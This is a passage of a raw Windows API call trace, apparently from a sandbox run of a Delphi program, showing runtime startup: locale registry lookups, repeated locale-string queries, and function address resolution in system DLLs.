[0117.095] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0117.095] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) 
returned 0x2 [0117.095] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0117.095] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0117.095] GetThreadLocale () returned 0x409 [0117.095] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x12fb50 | out: lpCPInfo=0x12fb50) returned 1 [0117.095] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0117.095] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0117.095] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0117.095] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0117.096] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x724448 [0117.096] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0117.096] GetLogicalProcessorInformation (in: Buffer=0x0, ReturnedLength=0x12fab0 | out: Buffer=0x0, ReturnedLength=0x12fab0) returned 0 [0117.096] GetLastError () returned 0x7a [0117.096] GetLogicalProcessorInformation (in: Buffer=0x6099d0, ReturnedLength=0x12fab0 | out: Buffer=0x6099d0, ReturnedLength=0x12fab0) returned 1 [0117.096] GetCurrentThreadId () returned 0xe60 [0117.096] GetCurrentThreadId () returned 0xe60 [0117.096] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="2") returned 2 [0117.096] GetThreadLocale () returned 0x409 [0117.096] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0117.096] GetThreadLocale () returned 0x409 [0117.096] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0117.096] GetCurrentThreadId () returned 0xe60 [0117.096] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, 
lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sun") returned 4 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sunday") returned 7 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Mon") returned 4 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Monday") returned 7 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tue") returned 4 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tuesday") returned 8 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wed") returned 4 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wednesday") returned 10 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thu") returned 4 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thursday") returned 9 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Fri") returned 4 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Friday") returned 7 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sat") returned 4 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Saturday") returned 9 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jan") returned 4 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="January") returned 8 [0117.097] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x45, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Feb") returned 4 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="February") returned 9 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Mar") returned 4 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="March") returned 6 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Apr") returned 4 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="April") returned 6 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jun") returned 4 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="June") returned 5 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jul") returned 4 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="July") returned 5 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Aug") returned 4 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="August") returned 7 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Sep") returned 4 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="September") returned 10 [0117.097] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x4d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Oct") returned 4 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="October") returned 8 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Nov") returned 4 [0117.097] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="November") returned 9 [0117.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Dec") returned 4 [0117.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="December") returned 9 [0117.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f908, cchData=256 | out: lpLCData="$") returned 2 [0117.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0117.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0117.098] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0117.098] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fb00, cchData=2 | out: lpLCData=".") returned 2 [0117.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f908, cchData=256 | out: lpLCData="2") returned 2 [0117.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fb00, cchData=2 | out: lpLCData="/") returned 2 [0117.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0117.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0117.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0117.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, 
lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0117.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fb00, cchData=2 | out: lpLCData=":") returned 2 [0117.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f908, cchData=256 | out: lpLCData="AM") returned 3 [0117.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f908, cchData=256 | out: lpLCData="PM") returned 3 [0117.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0117.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0117.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0117.098] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0117.098] GetModuleHandleW (lpModuleName="oleaut32.dll") returned 0x76c10000 [0117.098] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeTypeEx") returned 0x76c14c28 [0117.098] GetProcAddress (hModule=0x76c10000, lpProcName="VarNeg") returned 0x76c8c802 [0117.098] GetProcAddress (hModule=0x76c10000, lpProcName="VarNot") returned 0x76c8ec66 [0117.098] GetProcAddress (hModule=0x76c10000, lpProcName="VarAdd") returned 0x76c35934 [0117.099] GetProcAddress (hModule=0x76c10000, lpProcName="VarSub") returned 0x76c8d332 [0117.099] GetProcAddress (hModule=0x76c10000, lpProcName="VarMul") returned 0x76c8dbd4 [0117.099] GetProcAddress (hModule=0x76c10000, lpProcName="VarDiv") returned 0x76c8e405 [0117.099] GetProcAddress (hModule=0x76c10000, lpProcName="VarIdiv") returned 0x76c8f00a [0117.099] GetProcAddress (hModule=0x76c10000, lpProcName="VarMod") returned 0x76c8f15e [0117.099] GetProcAddress (hModule=0x76c10000, lpProcName="VarAnd") returned 0x76c35a98 [0117.099] GetProcAddress (hModule=0x76c10000, lpProcName="VarOr") returned 0x76c8ecfa [0117.099] GetProcAddress 
(hModule=0x76c10000, lpProcName="VarXor") returned 0x76c8ee2e [0117.099] GetProcAddress (hModule=0x76c10000, lpProcName="VarCmp") returned 0x76c2b0dc [0117.099] GetProcAddress (hModule=0x76c10000, lpProcName="VarI4FromStr") returned 0x76c26fab [0117.099] GetProcAddress (hModule=0x76c10000, lpProcName="VarR4FromStr") returned 0x76c301a0 [0117.099] GetProcAddress (hModule=0x76c10000, lpProcName="VarR8FromStr") returned 0x76c2699e [0117.099] GetProcAddress (hModule=0x76c10000, lpProcName="VarDateFromStr") returned 0x76c36ba7 [0117.099] GetProcAddress (hModule=0x76c10000, lpProcName="VarCyFromStr") returned 0x76c56c12 [0117.099] GetProcAddress (hModule=0x76c10000, lpProcName="VarBoolFromStr") returned 0x76c2dbd1 [0117.099] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromCy") returned 0x76c37fdc [0117.100] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromDate") returned 0x76c27a2a [0117.100] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromBool") returned 0x76c30355 [0117.100] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x84 [0117.100] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x88 [0117.100] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x8c [0117.100] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=17388911230) returned 1 [0117.100] GetTickCount () returned 0x27c6f [0117.100] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x17a)) [0117.100] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x17a)) [0117.100] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: 
lpPerformanceCount=0x12fc28*=17388929482) returned 1 [0117.100] GetTickCount () returned 0x27c6f [0117.100] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x17a)) [0117.100] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x17a)) [0117.100] GetModuleHandleW (lpModuleName="ole32.dll") returned 0x76750000 [0117.100] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0117.100] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x6182bc, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoCreateInstanceEx", lpUsedDefaultChar=0x0) returned 18 [0117.100] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstanceEx") returned 0x76799d4e [0117.100] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0117.100] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x60288c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoInitializeEx", lpUsedDefaultChar=0x0) returned 14 [0117.101] GetProcAddress (hModule=0x76750000, lpProcName="CoInitializeEx") returned 0x767909ad [0117.101] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 
lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0117.101] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x6182bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoAddRefServerProcess", lpUsedDefaultChar=0x0) returned 21 [0117.101] GetProcAddress (hModule=0x76750000, lpProcName="CoAddRefServerProcess") returned 0x767b3cf3 [0117.101] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0117.101] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x6182bc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoReleaseServerProcess", lpUsedDefaultChar=0x0) returned 22 [0117.101] GetProcAddress (hModule=0x76750000, lpProcName="CoReleaseServerProcess") returned 0x767b4314 [0117.101] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0117.101] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x6182bc, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoResumeClassObjects", lpUsedDefaultChar=0x0) returned 20 [0117.101] GetProcAddress (hModule=0x76750000, lpProcName="CoResumeClassObjects") returned 0x7675ea02 [0117.101] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 
lpUsedDefaultChar=0x0) returned 21 [0117.101] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x6182bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoSuspendClassObjects", lpUsedDefaultChar=0x0) returned 21 [0117.101] GetProcAddress (hModule=0x76750000, lpProcName="CoSuspendClassObjects") returned 0x767bbb02 [0117.101] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0117.101] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0117.101] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x61f48c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InitializeConditionVariable", lpUsedDefaultChar=0x0) returned 27 [0117.101] GetProcAddress (hModule=0x76910000, lpProcName="InitializeConditionVariable") returned 0x77289981 [0117.101] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0117.101] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x6182bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeConditionVariable", lpUsedDefaultChar=0x0) returned 21 [0117.101] GetProcAddress (hModule=0x76910000, lpProcName="WakeConditionVariable") returned 0x772d5a7b [0117.101] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 
lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0117.101] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x61f48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeAllConditionVariable", lpUsedDefaultChar=0x0) returned 24 [0117.102] GetProcAddress (hModule=0x76910000, lpProcName="WakeAllConditionVariable") returned 0x772545a5 [0117.102] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0117.102] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x61f48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SleepConditionVariableCS", lpUsedDefaultChar=0x0) returned 24 [0117.102] GetProcAddress (hModule=0x76910000, lpProcName="SleepConditionVariableCS") returned 0x769418be [0117.102] GetThreadLocale () returned 0x409 [0117.102] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0117.102] GetCurrentThreadId () returned 0xe60 [0117.102] GetCurrentThreadId () returned 0xe60 [0117.102] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="2") returned 2 [0117.102] GetThreadLocale () returned 0x409 [0117.102] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0117.102] GetThreadLocale () returned 0x409 [0117.102] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0117.102] GetCurrentThreadId () returned 0xe60 [0117.102] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sun") returned 4 [0117.102] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x30, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sunday") returned 7 [0117.102] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Mon") returned 4 [0117.102] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Monday") returned 7 [0117.102] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tue") returned 4 [0117.102] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tuesday") returned 8 [0117.102] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wed") returned 4 [0117.102] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wednesday") returned 10 [0117.102] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thu") returned 4 [0117.102] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thursday") returned 9 [0117.102] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Fri") returned 4 [0117.102] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Friday") returned 7 [0117.102] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sat") returned 4 [0117.102] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Saturday") returned 9 [0117.102] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jan") returned 4 [0117.102] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="January") returned 8 [0117.102] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Feb") returned 4 [0117.102] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x39, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="February") returned 9 [0117.102] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Mar") returned 4 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="March") returned 6 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Apr") returned 4 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="April") returned 6 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jun") returned 4 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="June") returned 5 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jul") returned 4 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="July") returned 5 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Aug") returned 4 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="August") returned 7 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Sep") returned 4 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="September") returned 10 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Oct") returned 4 [0117.103] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x41, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="October") returned 8 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Nov") returned 4 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="November") returned 9 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Dec") returned 4 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="December") returned 9 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f820, cchData=256 | out: lpLCData="$") returned 2 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fa18, cchData=2 | out: lpLCData=".") returned 2 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f820, cchData=256 | out: lpLCData="2") returned 2 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fa18, cchData=2 | out: lpLCData="/") returned 2 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, 